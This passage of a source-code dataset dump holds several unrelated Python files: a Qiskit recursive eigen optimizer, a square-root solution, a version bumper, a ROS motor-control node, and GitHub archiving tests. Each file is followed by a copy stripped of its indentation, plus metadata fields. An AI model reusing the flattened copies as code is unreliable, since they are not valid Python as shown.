from .optimization_algorithm import OptimizationAlgorithm, OptimizationResult
from .minimum_eigen_optimizer import MinimumEigenOptimizer, MinimumEigenOptimizationResult
from ..converters.quadratic_program_to_qubo import QuadraticProgramToQubo
from ..exceptions import QiskitOptimizationError
from ..problems import Variable
from ..problems.quadratic_program import QuadraticProgram
logger = logging.getLogger(__name__)
class IntermediateResult(Enum):
    """
    Defines whether the intermediate results of
    :class:`~qiskit.optimization.algorithms.RecursiveMinimumEigenOptimizer`
    at each iteration should be stored and returned to the end user.
    """
    # Members are ordered by how much history is retained (none -> last -> all).
    NO_ITERATIONS = 0
    """No intermediate results are stored."""
    LAST_ITERATION = 1
    """Only results from the last iteration are stored."""
    ALL_ITERATIONS = 2
    """All intermediate results are stored."""
class RecursiveMinimumEigenOptimizationResult(OptimizationResult):
    """Recursive Eigen Optimizer Result."""
    def __init__(self, x: Union[List[float], np.ndarray], fval: float,
                 variables: List[Variable],
                 replacements: Dict[str, Tuple[str, int]],
                 history: Tuple[List[MinimumEigenOptimizationResult], OptimizationResult]) -> None:
        """
        Constructs an instance of the result class.
        Args:
            x: the optimal value found in the optimization.
            fval: the optimal function value.
            variables: the list of variables of the optimization problem.
            replacements: a dictionary of substituted variables. Key is a variable being
                substituted, value is a tuple of substituting variable and a weight, either 1 or -1.
            history: a tuple containing intermediate results. The first element is a list of
                :class:`~qiskit.optimization.algorithms.MinimumEigenOptimizerResult` obtained by
                invoking :class:`~qiskit.optimization.algorithms.MinimumEigenOptimizer` iteratively,
                the second element is an instance of
                :class:`~qiskit.optimization.algorithm.OptimizationResult` obtained at the last step
                via `min_num_vars_optimizer`.
        """
        # Fourth base-class argument (presumably the raw solver results slot)
        # is intentionally None here -- confirm against OptimizationResult.
        super().__init__(x, fval, variables, None)
        self._replacements = replacements
        self._history = history
    @property
    def replacements(self) -> Dict[str, Tuple[str, int]]:
        """
        Returns a dictionary of substituted variables. Key is a variable being substituted, value
        is a tuple of substituting variable and a weight, either 1 or -1."""
        return self._replacements
    @property
    def history(self) -> Tuple[List[MinimumEigenOptimizationResult], OptimizationResult]:
        """
        Returns intermediate results. The first element is a list of
        :class:`~qiskit.optimization.algorithms.MinimumEigenOptimizerResult` obtained by invoking
        :class:`~qiskit.optimization.algorithms.MinimumEigenOptimizer` iteratively, the second
        element is an instance of :class:`~qiskit.optimization.algorithm.OptimizationResult`
        obtained at the last step via `min_num_vars_optimizer`.
        """
        return self._history
class RecursiveMinimumEigenOptimizer(OptimizationAlgorithm):
    """A meta-algorithm that applies a recursive optimization.
    The recursive minimum eigen optimizer applies a recursive optimization on top of
    :class:`~qiskit.optimization.algorithms.MinimumEigenOptimizer`.
    The algorithm is introduced in [1].
    Examples:
        Outline of how to use this class:
    .. code-block::
        from qiskit.aqua.algorithms import QAOA
        from qiskit.optimization.problems import QuadraticProgram
        from qiskit.optimization.algorithms import RecursiveMinimumEigenOptimizer
        problem = QuadraticProgram()
        # specify problem here
        # specify minimum eigen solver to be used, e.g., QAOA
        qaoa = QAOA(...)
        optimizer = RecursiveMinimumEigenOptimizer(qaoa)
        result = optimizer.solve(problem)
    References:
        [1]: Bravyi et al. (2019), Obstacles to State Preparation and Variational Optimization
        from Symmetry Protection. http://arxiv.org/abs/1910.08980.
    """
    def __init__(self, min_eigen_optimizer: MinimumEigenOptimizer, min_num_vars: int = 1,
                 min_num_vars_optimizer: Optional[OptimizationAlgorithm] = None,
                 penalty: Optional[float] = None,
                 history: Optional[IntermediateResult] = IntermediateResult.LAST_ITERATION) -> None:
        """ Initializes the recursive minimum eigen optimizer.
        This initializer takes a ``MinimumEigenOptimizer``, the parameters to specify until when to
        to apply the iterative scheme, and the optimizer to be applied once the threshold number of
        variables is reached.
        Args:
            min_eigen_optimizer: The eigen optimizer to use in every iteration.
            min_num_vars: The minimum number of variables to apply the recursive scheme. If this
                threshold is reached, the min_num_vars_optimizer is used.
            min_num_vars_optimizer: This optimizer is used after the recursive scheme for the
                problem with the remaining variables.
            penalty: The factor that is used to scale the penalty terms corresponding to linear
                equality constraints.
            history: Whether the intermediate results are stored.
                Default value is :py:obj:`~IntermediateResult.LAST_ITERATION`.
        Raises:
            QiskitOptimizationError: In case of invalid parameters (num_min_vars < 1).
        """
        validate_min('min_num_vars', min_num_vars, 1)
        self._min_eigen_optimizer = min_eigen_optimizer
        self._min_num_vars = min_num_vars
        if min_num_vars_optimizer:
            self._min_num_vars_optimizer = min_num_vars_optimizer
        else:
            # Default final-stage solver: exact classical minimum eigensolver.
            self._min_num_vars_optimizer = MinimumEigenOptimizer(NumPyMinimumEigensolver())
        # NOTE(review): _penalty is stored but not referenced elsewhere in this
        # class's visible code -- presumably consumed by the QUBO conversion;
        # confirm before relying on it.
        self._penalty = penalty
        self._history = history
        self._qubo_converter = QuadraticProgramToQubo()
    def get_compatibility_msg(self, problem: QuadraticProgram) -> str:
        """Checks whether a given problem can be solved with this optimizer.
        Checks whether the given problem is compatible, i.e., whether the problem can be converted
        to a QUBO, and otherwise, returns a message explaining the incompatibility.
        Args:
            problem: The optimization problem to check compatibility.
        Returns:
            A message describing the incompatibility.
        """
        return QuadraticProgramToQubo.get_compatibility_msg(problem)
    def solve(self, problem: QuadraticProgram) -> OptimizationResult:
        """Tries to solve the given problem using the recursive optimizer.
        Runs the optimizer to try to solve the optimization problem.
        Args:
            problem: The problem to be solved.
        Returns:
            The result of the optimizer applied to the problem.
        Raises:
            QiskitOptimizationError: Incompatible problem.
            QiskitOptimizationError: Infeasible due to variable substitution
        """
        self._verify_compatibility(problem)
        # convert problem to QUBO, this implicitly checks if the problem is compatible
        problem_ = self._qubo_converter.convert(problem)
        # keep an untouched copy so variable values can be unrolled at the end
        problem_ref = deepcopy(problem_)
        # run recursive optimization until the resulting problem is small enough
        replacements = {}  # type: Dict[str, Tuple[str, int]]
        min_eigen_results = []  # type: List[MinimumEigenOptimizationResult]
        while problem_.get_num_vars() > self._min_num_vars:
            # solve current problem with optimizer
            res = self._min_eigen_optimizer.solve(problem_)  # type: MinimumEigenOptimizationResult
            if self._history == IntermediateResult.ALL_ITERATIONS:
                min_eigen_results.append(res)
            # analyze results to get strongest correlation
            correlations = res.get_correlations()
            i, j = self._find_strongest_correlation(correlations)
            x_i = problem_.variables[i].name
            x_j = problem_.variables[j].name
            if correlations[i, j] > 0:
                # set x_i = x_j
                problem_ = problem_.substitute_variables(variables={i: (j, 1)})
                if problem_.status == QuadraticProgram.Status.INFEASIBLE:
                    raise QiskitOptimizationError('Infeasible due to variable substitution')
                replacements[x_i] = (x_j, 1)
            else:
                # set x_i = 1 - x_j, this is done in two steps:
                # 1. set x_i = 1 + x_i
                # 2. set x_i = -x_j
                # 1a. get additional offset
                # NOTE: the objective must be mutated *before* the substitution
                # below; the two steps are order-sensitive.
                constant = problem_.objective.constant
                constant += problem_.objective.linear[i]
                constant += problem_.objective.quadratic[i, i]
                problem_.objective.constant = constant
                # 1b. get additional linear part
                for k in range(problem_.get_num_vars()):
                    coeff = problem_.objective.linear[k]
                    if k == i:
                        coeff += 2*problem_.objective.quadratic[i, k]
                    else:
                        coeff += problem_.objective.quadratic[i, k]
                    # set new coefficient if not too small
                    if np.abs(coeff) > 1e-10:
                        problem_.objective.linear[k] = coeff
                    else:
                        problem_.objective.linear[k] = 0
                # 2. replace x_i by -x_j
                problem_ = problem_.substitute_variables(variables={i: (j, -1)})
                if problem_.status == QuadraticProgram.Status.INFEASIBLE:
                    raise QiskitOptimizationError('Infeasible due to variable substitution')
                replacements[x_i] = (x_j, -1)
        # solve remaining problem
        result = self._min_num_vars_optimizer.solve(problem_)
        # unroll replacements
        var_values = {}
        for i, x in enumerate(problem_.variables):
            var_values[x.name] = result.x[i]
        # recursively resolve a substituted variable's value from the variable
        # it was replaced by (sign -1 means x was set to 1 - y)
        def find_value(x, replacements, var_values):
            if x in var_values:
                # if value for variable is known, return it
                return var_values[x]
            elif x in replacements:
                # get replacement for variable
                (y, sgn) = replacements[x]
                # find details for replacing variable
                value = find_value(y, replacements, var_values)
                # construct, set, and return new value
                var_values[x] = value if sgn == 1 else 1 - value
                return var_values[x]
            else:
                raise QiskitOptimizationError('Invalid values!')
        # loop over all variables to set their values
        for x_i in problem_ref.variables:
            if x_i.name not in var_values:
                find_value(x_i.name, replacements, var_values)
        # build history before any translations are applied
        # min_eigen_results is an empty list if history is set to NO or LAST.
        history = (min_eigen_results,
                   None if self._history == IntermediateResult.NO_ITERATIONS else result)
        # construct result
        x_v = [var_values[x_aux.name] for x_aux in problem_ref.variables]
        fval = result.fval
        result = OptimizationResult(x=x_v, fval=fval, variables=problem_ref.variables)
        result = self._qubo_converter.interpret(result)
        return RecursiveMinimumEigenOptimizationResult(x=result.x, fval=result.fval,
                                                       variables=result.variables,
                                                       replacements=replacements,
                                                       history=history)
    def _find_strongest_correlation(self, correlations):
        # get absolute values and set diagonal to -1 to make sure maximum is always on off-diagonal
        abs_correlations = np.abs(correlations)
        for i in range(len(correlations)):
            abs_correlations[i, i] = -1
        # get index of maximum (by construction on off-diagonal)
        m_max = np.argmax(abs_correlations.flatten())
        # translate back to indices
        i = int(m_max // len(correlations))
        j = int(m_max - i*len(correlations))
        return (i, j)
| 43.584416
| 100
| 0.65003
|
from copy import deepcopy
from enum import Enum
from typing import Optional, Union, List, Tuple, Dict
import logging
import numpy as np
from qiskit.aqua.algorithms import NumPyMinimumEigensolver
from qiskit.aqua.utils.validation import validate_min
from .optimization_algorithm import OptimizationAlgorithm, OptimizationResult
from .minimum_eigen_optimizer import MinimumEigenOptimizer, MinimumEigenOptimizationResult
from ..converters.quadratic_program_to_qubo import QuadraticProgramToQubo
from ..exceptions import QiskitOptimizationError
from ..problems import Variable
from ..problems.quadratic_program import QuadraticProgram
logger = logging.getLogger(__name__)
class IntermediateResult(Enum):
NO_ITERATIONS = 0
LAST_ITERATION = 1
ALL_ITERATIONS = 2
class RecursiveMinimumEigenOptimizationResult(OptimizationResult):
def __init__(self, x: Union[List[float], np.ndarray], fval: float,
variables: List[Variable],
replacements: Dict[str, Tuple[str, int]],
history: Tuple[List[MinimumEigenOptimizationResult], OptimizationResult]) -> None:
super().__init__(x, fval, variables, None)
self._replacements = replacements
self._history = history
@property
def replacements(self) -> Dict[str, Tuple[str, int]]:
return self._replacements
@property
def history(self) -> Tuple[List[MinimumEigenOptimizationResult], OptimizationResult]:
return self._history
class RecursiveMinimumEigenOptimizer(OptimizationAlgorithm):
def __init__(self, min_eigen_optimizer: MinimumEigenOptimizer, min_num_vars: int = 1,
min_num_vars_optimizer: Optional[OptimizationAlgorithm] = None,
penalty: Optional[float] = None,
history: Optional[IntermediateResult] = IntermediateResult.LAST_ITERATION) -> None:
validate_min('min_num_vars', min_num_vars, 1)
self._min_eigen_optimizer = min_eigen_optimizer
self._min_num_vars = min_num_vars
if min_num_vars_optimizer:
self._min_num_vars_optimizer = min_num_vars_optimizer
else:
self._min_num_vars_optimizer = MinimumEigenOptimizer(NumPyMinimumEigensolver())
self._penalty = penalty
self._history = history
self._qubo_converter = QuadraticProgramToQubo()
def get_compatibility_msg(self, problem: QuadraticProgram) -> str:
return QuadraticProgramToQubo.get_compatibility_msg(problem)
def solve(self, problem: QuadraticProgram) -> OptimizationResult:
self._verify_compatibility(problem)
problem_ = self._qubo_converter.convert(problem)
problem_ref = deepcopy(problem_)
replacements = {}
min_eigen_results = []
while problem_.get_num_vars() > self._min_num_vars:
res = self._min_eigen_optimizer.solve(problem_)
if self._history == IntermediateResult.ALL_ITERATIONS:
min_eigen_results.append(res)
correlations = res.get_correlations()
i, j = self._find_strongest_correlation(correlations)
x_i = problem_.variables[i].name
x_j = problem_.variables[j].name
if correlations[i, j] > 0:
problem_ = problem_.substitute_variables(variables={i: (j, 1)})
if problem_.status == QuadraticProgram.Status.INFEASIBLE:
raise QiskitOptimizationError('Infeasible due to variable substitution')
replacements[x_i] = (x_j, 1)
else:
constant = problem_.objective.constant
constant += problem_.objective.linear[i]
constant += problem_.objective.quadratic[i, i]
problem_.objective.constant = constant
for k in range(problem_.get_num_vars()):
coeff = problem_.objective.linear[k]
if k == i:
coeff += 2*problem_.objective.quadratic[i, k]
else:
coeff += problem_.objective.quadratic[i, k]
if np.abs(coeff) > 1e-10:
problem_.objective.linear[k] = coeff
else:
problem_.objective.linear[k] = 0
problem_ = problem_.substitute_variables(variables={i: (j, -1)})
if problem_.status == QuadraticProgram.Status.INFEASIBLE:
raise QiskitOptimizationError('Infeasible due to variable substitution')
replacements[x_i] = (x_j, -1)
result = self._min_num_vars_optimizer.solve(problem_)
var_values = {}
for i, x in enumerate(problem_.variables):
var_values[x.name] = result.x[i]
def find_value(x, replacements, var_values):
if x in var_values:
return var_values[x]
elif x in replacements:
(y, sgn) = replacements[x]
value = find_value(y, replacements, var_values)
var_values[x] = value if sgn == 1 else 1 - value
return var_values[x]
else:
raise QiskitOptimizationError('Invalid values!')
for x_i in problem_ref.variables:
if x_i.name not in var_values:
find_value(x_i.name, replacements, var_values)
history = (min_eigen_results,
None if self._history == IntermediateResult.NO_ITERATIONS else result)
x_v = [var_values[x_aux.name] for x_aux in problem_ref.variables]
fval = result.fval
result = OptimizationResult(x=x_v, fval=fval, variables=problem_ref.variables)
result = self._qubo_converter.interpret(result)
return RecursiveMinimumEigenOptimizationResult(x=result.x, fval=result.fval,
variables=result.variables,
replacements=replacements,
history=history)
def _find_strongest_correlation(self, correlations):
abs_correlations = np.abs(correlations)
for i in range(len(correlations)):
abs_correlations[i, i] = -1
m_max = np.argmax(abs_correlations.flatten())
i = int(m_max // len(correlations))
j = int(m_max - i*len(correlations))
return (i, j)
| true
| true
|
790c6bbc06bf28c97b8abd222424095a64d7b052
| 335
|
py
|
Python
|
SEARCHING/EASY/Sqrt(x)/Code.py
|
HassanRahim26/LEETCODE
|
c0ec81b037ff7b2d6e6030ac9835c21ed825100f
|
[
"MIT"
] | 3
|
2021-08-31T11:02:28.000Z
|
2022-01-17T08:07:00.000Z
|
SEARCHING/EASY/Sqrt(x)/Code.py
|
HassanRahim26/LEETCODE
|
c0ec81b037ff7b2d6e6030ac9835c21ed825100f
|
[
"MIT"
] | null | null | null |
SEARCHING/EASY/Sqrt(x)/Code.py
|
HassanRahim26/LEETCODE
|
c0ec81b037ff7b2d6e6030ac9835c21ed825100f
|
[
"MIT"
] | null | null | null |
# PROBLEM LINK:- https://leetcode.com/problems/sqrtx/
class Solution:
    def mySqrt(self, x):
        """Return the integer square root of x (LeetCode 69).

        Bisects on floats until the bracket [lo, hi] is narrower than eps,
        then truncates the upper bound; hi always satisfies hi*hi >= x.
        """
        eps = 1e-6
        lo, hi = 1, x
        while hi - lo > eps:
            mid = (lo + hi) / 2
            if mid * mid < x:
                lo = mid
            else:
                hi = mid
        return int(hi)
| 22.333333
| 53
| 0.426866
|
class Solution:
def mySqrt(self, x):
a = 1e-6
low = 1
high = x
while high - low > a:
mid = (high + low)/2
if mid * mid < x:
low = mid
else:
high = mid
return int(high)
| true
| true
|
790c6d754b2f6b4a829eb710e03b699641ff0b23
| 551
|
py
|
Python
|
src/version.py
|
StevenBaby/chess
|
1aa3065d974351df58a5620c78ca80a10a385321
|
[
"MIT"
] | 10
|
2021-06-17T21:45:59.000Z
|
2022-03-23T04:02:45.000Z
|
src/version.py
|
StevenBaby/chess
|
1aa3065d974351df58a5620c78ca80a10a385321
|
[
"MIT"
] | 2
|
2021-05-30T11:52:44.000Z
|
2021-06-29T11:06:31.000Z
|
src/version.py
|
StevenBaby/chess
|
1aa3065d974351df58a5620c78ca80a10a385321
|
[
"MIT"
] | 1
|
2021-06-19T03:41:23.000Z
|
2021-06-19T03:41:23.000Z
|
# coding=utf-8
VERSION = '1.8.1'
__VERSION__ = VERSION
def increase():
    """Bump the patch component of the VERSION string in this source file, in place.

    Reads this file, finds the ``VERSION = 'a.b.c'`` assignment, and rewrites
    the file with the patch number incremented (a.b.c -> a.b.c+1).
    """
    import os
    import re
    filename = os.path.abspath(__file__)
    with open(filename, encoding='utf8') as file:
        content = file.read()
    # Fix: dots are escaped so they match a literal '.'; the original pattern
    # used bare '.' (any character), which could match unintended strings.
    match = re.search(r"VERSION = '(\d+)\.(\d+)\.(\d+)'", content)
    old = f'{match.group(1)}.{match.group(2)}.{match.group(3)}'
    new = f'{match.group(1)}.{match.group(2)}.{int(match.group(3)) + 1}'
    # NOTE(review): str.replace swaps *every* occurrence of the old version
    # text; assumes it only appears in the VERSION assignment -- confirm.
    content = content.replace(old, new)
    with open(filename, 'w', encoding='utf8') as file:
        file.write(content)
| 25.045455
| 72
| 0.598911
|
VERSION = '1.8.1'
__VERSION__ = VERSION
def increase():
import os
import re
filename = os.path.abspath(__file__)
with open(filename, encoding='utf8') as file:
content = file.read()
match = re.search(r"VERSION = '(\d+).(\d+).(\d+)'", content)
old = f'{match.group(1)}.{match.group(2)}.{match.group(3)}'
new = f'{match.group(1)}.{match.group(2)}.{int(match.group(3)) + 1}'
content = content.replace(old, new)
with open(filename, 'w', encoding='utf8') as file:
file.write(content)
| true
| true
|
790c6d832bf56b9e7c35fdae1589b565cce84fd9
| 147
|
py
|
Python
|
src/backend/tests/factories/record_factory.py
|
NickSchimek/recordexpungPDX
|
34ed0f3cb5b7368a935a11306d3143d0d154c2de
|
[
"CNRI-Python",
"RSA-MD",
"Xnet",
"Linux-OpenIB",
"FTL",
"X11"
] | null | null | null |
src/backend/tests/factories/record_factory.py
|
NickSchimek/recordexpungPDX
|
34ed0f3cb5b7368a935a11306d3143d0d154c2de
|
[
"CNRI-Python",
"RSA-MD",
"Xnet",
"Linux-OpenIB",
"FTL",
"X11"
] | 93
|
2019-12-07T01:43:50.000Z
|
2021-08-01T13:30:44.000Z
|
src/backend/tests/factories/record_factory.py
|
NickSchimek/recordexpungPDX
|
34ed0f3cb5b7368a935a11306d3143d0d154c2de
|
[
"CNRI-Python",
"RSA-MD",
"Xnet",
"Linux-OpenIB",
"FTL",
"X11"
] | null | null | null |
from expungeservice.models.record import Record
class RecordFactory:
    """Factory that builds a Record from an iterable of cases."""
    @staticmethod
    def create(cases):
        # Materialize the iterable so Record always receives a concrete list.
        return Record([case for case in cases])
| 18.375
| 47
| 0.727891
|
from expungeservice.models.record import Record
class RecordFactory:
@staticmethod
def create(cases):
return Record(list(cases))
| true
| true
|
790c6e105d00aa08941205a5c43b27df00b37ef3
| 1,383
|
py
|
Python
|
deprecated/led_control.py
|
isarlab-department-engineering/ros_dt_stop_light_detection
|
32d0e9f0c4a9f80510c450adc87764444e910d31
|
[
"BSD-3-Clause"
] | null | null | null |
deprecated/led_control.py
|
isarlab-department-engineering/ros_dt_stop_light_detection
|
32d0e9f0c4a9f80510c450adc87764444e910d31
|
[
"BSD-3-Clause"
] | null | null | null |
deprecated/led_control.py
|
isarlab-department-engineering/ros_dt_stop_light_detection
|
32d0e9f0c4a9f80510c450adc87764444e910d31
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# this node will be implemented on the master node
# this is a test script for drive motor
# in function of stop and front lights detection
# this script will be implemented in another node
# import libraries
import rospy,sys,time,atexit,numpy
from std_msgs.msg import String,Int16MultiArray
# Module state: avoidance flag plus the 4-element motor command published on "cmd".
avoidingVehicle = False
array = Int16MultiArray()
array.data = []
controlPub = rospy.Publisher("cmd",Int16MultiArray,queue_size=1)
def turnOffMotors():
    # Publish an all-zero command to stop both motors.
    array.data = [0,0,0,0]
    controlPub.publish(array)
def setSpeed(motor1,motor2):
    # Publish the two motor speeds; a (0, 0) request is routed through
    # turnOffMotors(). The last two array slots are always 0 here --
    # presumably reserved by the "cmd" protocol; confirm with the consumer.
    if motor1 == 0 and motor2 == 0:
        turnOffMotors()
    else:
        array.data = [motor1,motor2,0,0]
        controlPub.publish(array)
def avoidVehicle():
    # Avoidance maneuver placeholder: currently just stops and clears the flag.
    global avoidingVehicle
    turnOffMotors()
    avoidingVehicle = False
def callback(data):
    # Dispatch on command strings received from led_control_topic:
    # "stop"/"s" stop the motors, "front" triggers avoidance once,
    # "w" drives forward at a fixed speed.
    global avoidingVehicle
    rospy.loginfo(rospy.get_caller_id() +" Led control String received: %s",data.data)
    if data.data == "stop" :
        turnOffMotors()
    elif (data.data == "front" and avoidingVehicle == False):
        avoidingVehicle = True
        avoidVehicle()
    elif data.data == "w":
        setSpeed(150,150)
    elif data.data == "s":
        turnOffMotors()
def led_control():
    # Node entry point: register the subscriber and spin until shutdown.
    rospy.init_node('led_control',anonymous=True)
    rospy.Subscriber('led_control_topic',String,callback)
    try:
        rospy.spin()
    except KeyboardInterrupt:
        print("Shutting down")
if __name__ == '__main__':
    led_control()
| 23.844828
| 83
| 0.737527
|
import rospy,sys,time,atexit,numpy
from std_msgs.msg import String,Int16MultiArray
avoidingVehicle = False
array = Int16MultiArray()
array.data = []
controlPub = rospy.Publisher("cmd",Int16MultiArray,queue_size=1)
def turnOffMotors():
array.data = [0,0,0,0]
controlPub.publish(array)
def setSpeed(motor1,motor2):
if motor1 == 0 and motor2 == 0:
turnOffMotors()
else:
array.data = [motor1,motor2,0,0]
controlPub.publish(array)
def avoidVehicle():
global avoidingVehicle
turnOffMotors()
avoidingVehicle = False
def callback(data):
global avoidingVehicle
rospy.loginfo(rospy.get_caller_id() +" Led control String received: %s",data.data)
if data.data == "stop" :
turnOffMotors()
elif (data.data == "front" and avoidingVehicle == False):
avoidingVehicle = True
avoidVehicle()
elif data.data == "w":
setSpeed(150,150)
elif data.data == "s":
turnOffMotors()
def led_control():
rospy.init_node('led_control',anonymous=True)
rospy.Subscriber('led_control_topic',String,callback)
try:
rospy.spin()
except KeyboardInterrupt:
print("Shutting down")
if __name__ == '__main__':
led_control()
| true
| true
|
790c6e1bd0f1dc5b21d694dc4c0d511cdb5ede6d
| 415
|
py
|
Python
|
videomaker/functions/savePreset.py
|
TheTimebike/VideoMaker-Studio
|
289fd3b9f3c27d298ee94b1e79415a20ec084c4c
|
[
"MIT"
] | 4
|
2019-03-03T12:10:20.000Z
|
2021-09-05T12:30:25.000Z
|
videomaker/functions/savePreset.py
|
TheTimebike/VideoMaker-Studio
|
289fd3b9f3c27d298ee94b1e79415a20ec084c4c
|
[
"MIT"
] | null | null | null |
videomaker/functions/savePreset.py
|
TheTimebike/VideoMaker-Studio
|
289fd3b9f3c27d298ee94b1e79415a20ec084c4c
|
[
"MIT"
] | 2
|
2019-03-27T23:40:34.000Z
|
2019-10-07T11:09:32.000Z
|
import json
from videomaker.functions.packageData import packageData
from videomaker.functions.addPreset import addOption
def savePreset(focus):
    """Serialize the current state as a JSON preset file and register it
    as a selectable option in the UI."""
    preset = packageData(focus, verify=False)
    preset_path = "./presets/{0}.json".format(preset["subredditName"])
    with open(preset_path, "w+") as out:
        json.dump(preset, out, indent=4)
    addOption(focus, preset_path, preset["subredditName"])
| 41.5
| 99
| 0.73253
|
import json
from videomaker.functions.packageData import packageData
from videomaker.functions.addPreset import addOption
def savePreset(focus):
preset = packageData(focus, verify=False)
with open("./presets/{0}.json".format(preset["subredditName"]), "w+") as out:
json.dump(preset, out, indent=4)
addOption(focus, "./presets/{0}.json".format(preset["subredditName"]), preset["subredditName"])
| true
| true
|
790c7007d3b665975df26aa73591e924e9115794
| 6,815
|
py
|
Python
|
github_archive/test/test_get_github.py
|
hellkite500/github_scrape
|
e9d3b10b434349e08a92ef97e8414c8b9f0c7584
|
[
"CC0-1.0"
] | null | null | null |
github_archive/test/test_get_github.py
|
hellkite500/github_scrape
|
e9d3b10b434349e08a92ef97e8414c8b9f0c7584
|
[
"CC0-1.0"
] | null | null | null |
github_archive/test/test_get_github.py
|
hellkite500/github_scrape
|
e9d3b10b434349e08a92ef97e8414c8b9f0c7584
|
[
"CC0-1.0"
] | null | null | null |
import unittest
from typing import Optional
from pathlib import Path
from time import strftime, gmtime
from github import Github
import json
import yaml
from .. import get_repo_meta, clone_and_archive
from ..get_github import dump_list
from pathlib import Path
class TestGetGithub(unittest.TestCase):
"""
Test coverage for the get_github module
"""
_current_dir = Path(__file__).resolve().parent
#BORROWED from https://github.com/NOAA-OWP/DMOD/blob/master/python/lib/scheduler/dmod/test/it_redisManager.py
@classmethod
def find_project_root_directory(cls, current_directory: Optional[Path]) -> Optional[Path]:
"""
Given a directory (with ``None`` implying the current directory) assumed to be at or under this project's root,
find the project root directory.
This implementation attempts to find a directory having both a ``.git/`` child directory and a ``.env`` file.
Parameters
----------
current_directory
Returns
-------
Optional[Path]
The project root directory, or ``None`` if it fails to find it.
"""
if not current_directory:
current_directory = TestGetGithub._current_dir
abs_root = Path(current_directory.absolute().root)
while current_directory.absolute() != abs_root:
if not current_directory.is_dir():
current_directory = current_directory.parent
continue
git_sub_dir = current_directory.joinpath('.git')
child_env_file = current_directory.joinpath('config.yaml')
if git_sub_dir.exists() and git_sub_dir.is_dir() and child_env_file.exists() and child_env_file.is_file():
return current_directory
current_directory = current_directory.parent
return None
@classmethod
def load_token(cls):
"""
Read an API token from a configuration file, if none found, use '' for no auth
"""
token = ''
root_dir = cls.find_project_root_directory(None)
if not root_dir:
return token
config_file = root_dir/'config.yaml'
if config_file.exists():
with open(config_file) as file:
config = yaml.load(file, Loader=yaml.FullLoader)
try:
token = config['token']
except:
print("Unable to load api-token from project root directory config.yaml")
return token
def setUp(self):
self.token = self.load_token()
if self.token:
#Token auth github, higher rate limit
self.github = Github(self.token)
else:
#Anonimous github, severly rate limited API
self.github = Github()
self.org_string = 'NOAA-OWP'
self.repo_string = 'owp-open-source-project-template'
self.repo_w_wiki = 'DMOD'
self.org = self.github.get_organization(self.org_string)
self.wiki_repo = self.org.get_repo(self.repo_w_wiki)
self.repo = self.org.get_repo(self.repo_string)
self.time = strftime("%Y-%m-%d_%H:%M:%S", gmtime())
def tearDown(self):
for p in Path(TestGetGithub._current_dir).glob("*.json"):
if p.is_file():
p.unlink()
for p in Path(TestGetGithub._current_dir).glob("*.tar.gz"):
if p.is_file():
p.unlink()
def test_get_repo_meta(self):
"""
Test the archive_repo function to ensure all meta data is properly captured
"""
meta = get_repo_meta(self.repo, self.time, TestGetGithub._current_dir)
self.assertIsNotNone(meta)
self.assertTrue(len(meta), 6)
#defer name substitution
pattern = "{repo}_{name}_{time}.json".format(repo=self.repo_string, name="{name}", time=self.time)
self.assertEqual(meta[0].name, pattern.format(name='comments'))
self.assertEqual(meta[1].name, pattern.format(name='issues'))
self.assertEqual(meta[2].name, pattern.format(name='issue_comments'))
self.assertEqual(meta[3].name, pattern.format(name='pulls'))
self.assertEqual(meta[4].name, pattern.format(name='pulls_comments'))
self.assertEqual(meta[5].name, pattern.format(name='pulls_review_comments'))
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='comments')).exists())
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='issues')).exists())
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='issue_comments')).exists())
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='pulls')).exists())
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='pulls_comments')).exists())
self.assertTrue((TestGetGithub._current_dir/pattern.format(name='pulls_review_comments')).exists())
def test_clone_and_archive(self):
"""
Test the clone functionality
"""
#Sorta hackily testing the archive_repo logic here...FIXME later
#FIXME has_wiki is broke!!!
self.assertFalse(self.repo.has_wiki)
clone_url = self.repo.clone_url
archive_name = clone_and_archive(self.repo_string, clone_url, self.time, TestGetGithub._current_dir, [])
name = '{repo}_github_archive_{time}.tar.gz'.format(repo=self.repo_string, time=self.time)
self.assertEqual(archive_name.name, name)
self.assertTrue((TestGetGithub._current_dir/name).exists())
#TODO test existence of repo in archive
def test_clone_and_archive_1(self):
"""
Test cloning a repo with a wiki
"""
#Sorta hackily testing the archive_repo logic here...FIXME later
self.assertTrue(self.wiki_repo.has_wiki)
wiki_url = self.wiki_repo.clone_url[:-3]+'wiki.git'
#finally get the repo code itself
clone_url = self.wiki_repo.clone_url
archive_name = clone_and_archive(self.repo_w_wiki, clone_url, self.time, TestGetGithub._current_dir, [], wiki_url)
name = '{repo}_github_archive_{time}.tar.gz'.format(repo=self.repo_w_wiki, time=self.time)
self.assertEqual(archive_name.name, name)
self.assertTrue((TestGetGithub._current_dir/name).exists())
#TODO test existense of wiki in archive
@unittest.skip("Incomplete mock implementation for dumped item")
def test_dump_list(self):
pass
#Quick json format test for list objects
outfile = dump_list("test_repo", self.time, TestGetGithub._current_dir, "test_key", [ '{json=dict, test=values}', 'json=dict2, test=values2}'])
with open(outfile) as fp:
data = json.load(fp)
self.assertTrue(data['json'], 'dict')
| 44.253247
| 151
| 0.650624
|
import unittest
from typing import Optional
from pathlib import Path
from time import strftime, gmtime
from github import Github
import json
import yaml
from .. import get_repo_meta, clone_and_archive
from ..get_github import dump_list
from pathlib import Path
class TestGetGithub(unittest.TestCase):
_current_dir = Path(__file__).resolve().parent
@classmethod
def find_project_root_directory(cls, current_directory: Optional[Path]) -> Optional[Path]:
if not current_directory:
current_directory = TestGetGithub._current_dir
abs_root = Path(current_directory.absolute().root)
while current_directory.absolute() != abs_root:
if not current_directory.is_dir():
current_directory = current_directory.parent
continue
git_sub_dir = current_directory.joinpath('.git')
child_env_file = current_directory.joinpath('config.yaml')
if git_sub_dir.exists() and git_sub_dir.is_dir() and child_env_file.exists() and child_env_file.is_file():
return current_directory
current_directory = current_directory.parent
return None
@classmethod
def load_token(cls):
token = ''
root_dir = cls.find_project_root_directory(None)
if not root_dir:
return token
config_file = root_dir/'config.yaml'
if config_file.exists():
with open(config_file) as file:
config = yaml.load(file, Loader=yaml.FullLoader)
try:
token = config['token']
except:
print("Unable to load api-token from project root directory config.yaml")
return token
def setUp(self):
self.token = self.load_token()
if self.token:
self.github = Github(self.token)
else:
self.github = Github()
self.org_string = 'NOAA-OWP'
